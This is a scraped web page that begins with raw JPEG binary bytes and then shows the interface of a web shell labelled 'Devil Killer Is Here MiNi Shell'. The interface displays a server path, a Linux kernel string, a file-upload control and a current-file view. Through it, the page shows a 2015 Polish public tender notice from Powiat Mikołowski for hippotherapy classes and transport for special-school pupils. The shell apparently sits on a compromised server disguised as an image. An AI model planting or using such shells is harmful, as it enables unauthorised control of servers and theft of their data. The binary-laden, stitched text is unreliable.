JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150327/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20150327/43373-N-2015.html

<p class="kh_header"><b>Mikołów: Przeprowadzenie dodatkowych zajęć specjalistycznych z hipoterapii oraz organizacja dowozu na zajęcia programowe przewidziane w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</b><br>
<b>Numer ogłoszenia: 43373 - 2015; data zamieszczenia: 27.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Powiatu Mikołowskiego , ul. Żwirki i Wigury 4a, 43-190 Mikołów, woj. śląskie, tel. (032) 32-48-100,  32-48-125, faks (032) 32-48-147, 32-48-132.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.mikolowski.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przeprowadzenie dodatkowych zajęć specjalistycznych z hipoterapii oraz organizacja dowozu na zajęcia programowe przewidziane w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem i zakresem zamówienia jest: przeprowadzenie dodatkowych zajęć specjalistycznych z hipoterapii oraz organizacja dowozu na zajęcia programowe przewidziane w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Programu Operacyjnego Kapitał Ludzki, Priorytet IX Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszanie różnic w jakości usług edukacyjnych.

Zamawiający podzielił przedmiot zamówienia na 2 zadania. 
ZADANIE I. Przeprowadzenie dodatkowych zajęć specjalistycznych z hipoterapii, przewidzianych w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Nr 
Zadania 
Rodzaj zajęć
Nazwa zajęć
Liczba grup

Liczba h zegarowych na : 
I)
a) grupę
b) razem
II)
a) grupę
b) razem

Liczba uczniów 
a) min. w 1 gr.
b) razem
1. 
Dodatkowe zajęcia specjalistyczne
Hipoterapia
6 grup

I) a) 1gr. x 15h 
b) 4 gr. x 15h = 60h
II) a) 1 gr. x 12,5h
b) 2 gr. x 12,5h=25h
a) 5 os.
b) 30 os.


LICZBA GODZIN ŁĄCZNIE                                                                                         85 h
85 h


A.Zajęcia odbywać się będą w 6 grupach po 5 osób, według następującego rozkładu:
- 4 grupy po 6 wyjazdów - razem 24 wyjazdy po 2,5 godziny, łącznie 60 godzin,
- 2 grupy po 5 wyjazdów - razem 10 wyjazdów po 2,5 godziny, łącznie 25 godzin,
co daje razem 85 godzin zajęć hipoterapii,  przy czym jako 1 godzinę zajęć Zamawiający rozumie 60 minut, w tym rozgrzewkę, jazdę konną, zajęcia teoretyczne dotyczące budowy konia, jeździectwa, opieki i pielęgnacji konia.
B.Wykonawca zobowiązany jest do wykupienia ubezpieczenia od następstw nieszczęśliwych wypadków w trakcie zajęć, w drodze na zajęcia i po zajęciach na sumę 15 000,00 zł. oraz przekazania dokumentu potwierdzającego wykupienie ubezpieczenia Zamawiającemu do 3 dni przed rozpoczęciem zajęć.
C. Zajęcia z hipoterapii mają na celu:

- wzmocnienie procesu usprawniania psychoruchowego dzieci i młodzieży z różnymi schorzeniami i zaburzeniami rozwojowymi;
-  korekcję wad postawy, doskonalenie równowagi, koordynację i poczucie rytmu;
- zmniejszenie napięcia mięśniowego, które towarzyszy uszkodzeniu ośrodkowego układu nerwowego;
- normalizowanie napięcia mięśni spastycznych, poprawienie koordynacji wzrokowo-ruchowej i orientacji w schemacie ciała, kształtowanie orientacji przestrzennej, trenowanie zmysłu równowagi. 
D. W ciągu jednej godziny terapii Wykonawca zapewni obecność 1 opiekuna grupy oraz 1 hipoterapeuty - zapewniających zarówno bezpieczeństwo fizyczne dzieci, jak i odpowiedni poziom merytoryczny terapii.
E. Program zajęć ma zawierać co najmniej niżej wymienione moduły:
szkolenie dla opiekunów dzieci podczas zajęć hipoterapii
rozgrzewkę fizyczną i ćwiczenia programowe usprawniające
jazdę konną wraz z ćwiczeniami
poznawanie budowy ciała konia
kształtowanie orientacji w schemacie własnego ciała
doskonalenie sprawności ruchowej
stymulowanie zmysłów: słuchu, wzroku, dotyku, węchu
ćwiczenie koncentracji uwagi
wyzwalanie spontanicznej aktywności dziecka w pracy z koniem
naukę troski o higienę własną i konia - mycie rąk, czesanie, karmienie
okazywanie emocji i uczuć związanych z kontaktem ze zwierzętami
naukę samodzielności - samodzielne wykonywanie zadań z udziałem konia - czesanie, prowadzenie na uprzęży etc.
określanie związków przyczynowo-skutkowych, rozpoznawanie kolorów i kształtów, różnic i podobieństw.
ćwiczenia relaksacyjne

F. Zajęcia muszą być prowadzone w miejscu bezpiecznym, ogrodzonym, posiadającym odpowiednie podłoże zapewniające stabilność, antypoślizgowe (np. piasek, trociny), ośrodek musi być wyposażony w WC dostosowane dla osób niepełnosprawnych; w ośrodku powinno znajdować się pomieszczenie socjalne, w którym uczestnicy oczekujący na zajęcia mogą przebywać; ośrodek hipoterapii (stadnina) musi posiadać zadaszoną ujeżdżalnię.

G. Ze względu na niepełnosprawność psychoruchową dzieci znacznie utrudniającą funkcjonowanie uczestników / uczestniczek w czasie długotrwałej podróży, przedmiot zamówienia należy zrealizować w odległości nie dalszej niż 35 km liczonych od siedziby Zespołu Szkół Nr 2 Specjalnych w Mikołowie, ul. Pokoju 4a, 43 - 190 Mikołów - na podstawie  danych  GPS, trasa najkrótsza, zmierzona na samochód osobowy.
H. Za bezpieczeństwo dzieci podczas terapii odpowiada hipoterapeuta. 
I. Godziny odbywania się zajęć zostaną ustalone z Zamawiającym.
J. Wykonywanie w/w zadania odbywać się będzie przez czas trwania umowy od poniedziałku do soboty w godzinach uzgodnionych z Koordynatorem Projektu. 
Prawidłowość wykonania umowy zostanie potwierdzona poprzez prowadzenie dzienników zajęć i list obecności.
Wykonawca przeprowadzi w trakcie w/w zajęć ankiety ewaluacyjne oraz raport ewaluacyjny z przeprowadzonych ankiet. 
Wzory list obecności, dzienników zajęć, ankiet i raportów ewaluacyjnych zostaną uzgodnione z Koordynatorem Projektu.


ZADANIE II. Organizacja dowozu na zajęcia specjalistyczne z hipoterapii przewidzianych w ramach projektu pn. Kompleksowa Edukacja Specjalna - Program Rozwoju Szkół Specjalnych Powiatu Mikołowskiego współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.

Transport

Lp.

Rodzaj zajęć

Liczba uczniów

Ilość wyjazdów
Prognozowana
liczba km


1.
Hipoterapia 
6 gr. po 5 osób = 30 osób
34
3400


A. Do zadań Wykonawcy należy dowóz uczestników projektu na zajęcia specjalistyczne z hipoterapii, a po zakończonych zajęciach przywóz dzieci do domów na terenie Powiatu Mikołowskiego. Wykonywanie zadań odbywać się będzie od poniedziałku do soboty w godzinach uzgodnionych z Koordynatorem Projektu. Dokładne godziny dowozu i przywozu dzieci uzależnione są od ich rozkładu zajęć, przy czym Zamawiający zastrzega, że czas przejazdu dziecka z miejsca zamieszkania do placówki, gdzie realizowane będą zajęcia oraz po zajęciach z placówki do miejsca zamieszkania nie może przekroczyć jednej godziny w jedną stronę.

B. Maksymalna liczba osób korzystająca jednocześnie z usługi transportowej to 10 uczniów + 2 opiekunów + kierowca + 1 miejsce wolne.

C. Samochody muszą być wyraźnie oznakowane jako przewóz dzieci oraz osób niepełnosprawnych.

D. Wykonawca jest zobowiązany do opłacenia ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności (przewozu osób) na kwotę min. 50 000,00 zł.

E. Kierowca każdego samochodu zobowiązany jest do prowadzenia szczegółowego rejestru przejechanych km na każdej trasie. Wzór Karty przejazdu stanowi załącznik do umowy. Wykonawca zobowiązany jest do przedłożenia karty przejazdu Zamawiającemu do końca każdego okresu rozliczeniowego ujętego w harmonogramie płatności zgodnie z § 4 ust. 4 umowy.   

F. Wykonawca w czasie dowozu dzieci musi zapewnić na własny koszt, w każdym z samochodów dowożących dzieci opiekę osoby, która zagwarantuje przewożonym dzieciom warunki bezpieczeństwa w trakcie wsiadania, wysiadania oraz przejazdu. Kierowca nie może być jednocześnie opiekunem. Opiekun podpisuje Deklarację w sprawie ochrony zdrowia i życia dziecka w trakcie przejazdów na zajęcia i z powrotem, której wzór stanowi załącznik do umowy.

G. Wykonywanie w/w zadania odbywać się będzie przez czas trwania umowy od poniedziałku do soboty w godzinach uzgodnionych z Koordynatorem Projektu. 

H. Wykonywanie w/w zadania odbywać się będzie na terenie powiatu mikołowskiego i okolic, jednak w odległości nie dalszej niż 35 km liczonych od siedziby Zespołu Szkół  Nr 2 Specjalnych w Mikołowie, ul. Pokoju 4a, 43 - 190 Mikołów..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.31.25.00-4, 80.51.13.00-3, 60.10.00.00-9, 60.17.20.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 12.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiajacy nie żąda wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiada aktualne uprawnienia do przewozu osób w krajowym transporcie drogowym wydane na podstawie przepisów ustawy o transporcie drogowym ( t.j. Dz.U. 2013, poz.1414 z późn.zm.)- dotyczy Zadania II</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponuje minimum dwoma końmi przeszkolonymi do hipoterapii zgodnie z kanonami Polskiego Towarzystwa Hipoterapeutycznego- dotyczy zadania I;
Zadanie II.
Dysponuje:
-  minimum  1 mikrobusem  posiadającym  minimum 7 miejsc siedzących + kierowca; 
-  minimum  1 autobusem  posiadającym  minimum 17 miejsc siedzących + kierowca,   dostosowanym  do jednoczesnego przewozu dwóch osób na wózkach inwalidzkich manualnych i , wyposażonym w automatyczną windę lub podjazd dla wózków inwalidzkich.
Wykonawca łącznie musi dysponować minimum  dwoma pojazdami.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zadanie I.
Dysponuje:
- minimum jedną osobą (trenerem) posiadającą minimum 2-letnie doświadczenie w prowadzeniu zajęć  w zakresie hipoterapii z osobami niepełnosprawnymi i ukończony kurs instruktora hipoterapii wraz z uzyskaniem tytułu zawodowego instruktora rekreacji ruchowej o specjalności hipoterapia; 
- minimum jedną osobą (opiekunem) :
a) z  wykształceniem wyższym pedagogicznym w zakresie pedagogiki specjalnej  lub oligofrenopedagogiki lub
b) z wykształceniem wyższym pedagogicznym i ukończonym kursem kwalifikacyjnym lub studiami podyplomowymi w zakresie pedagogiki specjalnej lub oligofrenopedagogiki lub
c) z wykształceniem wyższym, kwalifikacjami pedagogicznymi i ukończonym kursem kwalifikacyjnym lub studiami podyplomowymi w zakresie pedagogiki specjalnej lub oligofrenopedagogiki,
oraz posiadająca co najmniej 2 - letnie doświadczenie w pracy z osobami niepełnosprawnymi;</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje tego warunku.
Zgodnie z art. 26 ust. 2b ustawy Wykonawca może polegać na wiedzy i doświadczeniu, potencjale 
technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów, niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował  tymi zasobami w trakcie realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na  potrzeby wykonania zamówienia. 

II. Inne warunki udziału w postępowaniu dla zadania I i II.
1.Brak podstaw do wykluczenia wykonawcy z powodu niespełnienia warunków, o których mowa w art.24 ust.1 ustawy Prawo Zamówień Publicznych.
2. Brak podstaw  do wykluczenia wykonawców na podstawie art.24 ust.2 pkt.5 ustawy Prawo Zamówień Publicznych tj., którzy należąc do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. Nr 50, poz. 331, z późn. zm.), złożyli odrębne oferty w tym samym postępowaniu, chyba że wykażą, że istniejące między nimi powiązania nie prowadzą do zachwiania uczciwej konkurencji pomiędzy wykonawcami w postępowaniu o udzielenie zamówienia.
Ocena spełniania poszczególnych warunków  przez Wykonawców zostanie dokonana na podstawie złożonej oferty oraz złożonych przez wykonawców oświadczeń i dokumentów, wymaganych przez Zamawiającego w SIWZ i zostanie przeprowadzona zgodnie z formułą - spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zadanie I.
1). wypełniony i podpisany formularz ofertowy stanowiący zał. nr 1  do SIWZ,
2) Jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania wykonawcy do oferty należy załączyć pełnomocnictwo (upoważnienie)w formie oryginału podpisane przez osoby uprawnione do reprezentowania wykonawcy lub w formie kopii poświadczonej notarialnie.
3) w przypadku wykonawców wspólnie ubiegających się o udzialenia zamówienia pełnomocnictwo/upoważnieniem dla pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego.Pełnomocnictwo musi być w formie oryginału lub w formie kopii poświadczonej notarialnie.
4) w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu ,potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów Wykonawca zobowiązany jest do przedstawienia w szczególności pisemnego zobowiązania tych podmiotów ( np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy ) do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.W celu oceny , czy Wykonawca będzie dysponował zaasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów zobowiązanie lub dokument    musi zawierać minimum: 
- dane pozwalające na identyfikację stron; 
- zakres dostępnych wykonawcy zasobów innego podmiotu ; 
- sposób wykorzystania zasobów innego podmiotu przez wykonawcę, przy wykonywaniu zamówienia 
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia;
- charakter stosunku jaki będzie łączył wykonawcę z innym podmiotem;
Zadanie II.
1). wypełniony i podpisany formularz ofertowy stanowiący zał. nr 1a  do SIWZ,
2) Jeżeli oferta podpisana jest przez osobę inną niż upoważniona do reprezentowania wykonawcy do oferty należy załączyć pełnomocnictwo (upoważnienie)w formie oryginału podpisane przez osoby uprawnione do reprezentowania wykonawcy lub w formie kopii poświadczonej notarialnie.
3) w przypadku wykonawców wspólnie ubiegających się o udzialenia zamówienia pełnomocnictwo/upoważnieniem dla pełnomocnika wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia  albo reprezentowania w postępowaniu i zawarcia umowy  w sprawie zamówienia publicznego.Pełnomocnictwo musi być w formie oryginału lub w formie kopii poświadczonej notarialnie.
4) w przypadku gdy Wykonawca polega na wiedzy i doświadczeniu ,potencjale technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów Wykonawca zobowiązany jest do przedstawienia w szczególności pisemnego zobowiązania tych podmiotów ( np. pisemne oświadczenie podmiotu trzeciego, umowa przedwstępna, umowa generalna o współpracy ) do oddania mu do dyspozycji niezbędnych zasobów na potrzeby wykonania zamówienia.W celu oceny , czy Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów zobowiązanie lub inny dokument    musi zawierać minimum: 
- dane pozwalające na identyfikację stron; 
- zakres dostępnych wykonawcy zasobów innego podmiotu ; 
- sposób wykorzystania zasobów innego podmiotu przez wykonawcę, przy wykonywaniu zamówienia 
- zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia;
- charakter stosunku jaki będzie łączył wykonawcę z innym podmiotem;</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 98</li>
<li>2 - termin płatności - 2</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zadanie I.
W związku z art. 144 ustawy z dnia 29 stycznia 2004 r. Prawo zamówień (tekst jednolity: Dz. U. z dnia 09.08.2013 roku, poz.907) Zamawiający przewiduje możliwość zmiany istotnych postanowień Umowy w stosunku do treści Oferty, w następujących okolicznościach:
1. konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia Umowy,
2. gdy zmiana postanowień umownych jest korzystna dla Zamawiającego,
3. w przypadku gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na współfinansowanie zamówienia na usługę.
4. w przypadku wystąpienia siły wyższej. Siła wyższa oznacza wydarzenie zewnętrzne, nieprzewidywalne i poza kontrolą stron niniejszej umowy, którego skutkom nie można zapobiec, występujące po podpisaniu umowy, a powodujące niemożliwość wywiązania się z umowy w jej obecnym brzmieniu,
5. w przypadku zmiany stanu prawnego, który będzie wnosił nowe wymagania co do sposobu realizacji jakiegokolwiek elementu usług,
